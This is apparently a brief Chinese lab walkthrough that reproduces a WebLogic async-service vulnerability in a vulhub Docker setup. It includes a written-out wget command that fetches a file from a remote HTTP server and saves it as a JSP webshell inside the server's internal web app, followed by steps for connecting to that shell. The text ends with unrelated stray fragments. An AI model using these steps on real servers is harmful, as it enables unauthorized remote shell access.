1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.漏洞验证
http://47.121.211.205:7001/_async/AsyncResponseService
说明存在漏洞
3.在当前页面抓包 修改请求包 写入shell
wget http://47.121.211.205/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
4.访问上传文件并进行连接
47.121.211.205:7001/bea_wls_internal/678.jsp
访问上传文件
使用工具进行连接
)
)
---- OpenCL Platform 和 Device)
】子系统开发)